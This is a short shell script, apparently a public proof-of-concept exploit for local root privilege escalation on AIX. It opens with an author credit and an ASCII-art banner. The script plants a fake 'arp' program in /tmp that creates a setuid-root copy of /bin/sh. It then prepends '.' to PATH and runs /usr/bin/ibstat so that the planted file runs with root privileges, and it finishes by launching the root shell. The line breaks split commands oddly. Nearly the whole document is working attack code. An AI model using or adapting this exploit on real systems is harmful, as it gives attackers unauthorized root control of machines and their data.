#!/bin/sh
echo
'
mm mmmmm m m
'
echo
"[*] AIX root privilege escalation"
echo
"[*] Kristian Erik Hermansen"
echo
"[*] https://linkedin.com/in/kristianhermansen"
echo
"
+++++?????????????~.:,.:+???????????++++
+++++???????????+...:.,.,.=??????????+++
+++???????????~.,:~=~:::..,.~?????????++
+++???????????:,~==++++==~,,.?????????++
+++???????????,:=+++++++=~:,,~????????++
++++?????????+,~~=++++++=~:,,:????????++
+++++????????~,~===~=+~,,::,:+???????+++
++++++???????=~===++~~~+,,~::???????++++
++++++++?????=~=+++~~~:++=~:~+???+++++++
+++++++++????~~=+++~+=~===~~:+??++++++++
+++++++++?????~~=====~~==~:,:?++++++++++
++++++++++????+~==:::::=~:,+??++++++++++
++++++++++?????:~~=~~~~~::,??+++++++++++
++++++++++?????=~:~===~,,,????++++++++++
++++++++++???+:==~:,,.:~~..+??++++++++++
+++++++++++....==+===~~=~,...=?+++++++++
++++++++,........~=====..........+++++++
+++++................................++=
=+:....................................=
"
TMPDIR=
/tmp
TAINT=${TMPDIR}
/arp
RSHELL=${TMPDIR}
/r00t-sh
cat
> ${TAINT} <<-!
#!/bin/sh
cp
/bin/sh
${RSHELL}
chown
root ${RSHELL}
chmod
4555 ${RSHELL}
!
chmod
755 ${TAINT}
PATH=.:${PATH}
export
PATH
cd
${TMPDIR}
/usr/bin/ibstat
-a -i en0 2>
/dev/null
>
/dev/null
if
[ -e ${RSHELL} ];
then
echo
"[+] Access granted. Don't be evil..."
${RSHELL}
else
echo
"[-] Exploit failed. Try some 0day instead..."
fi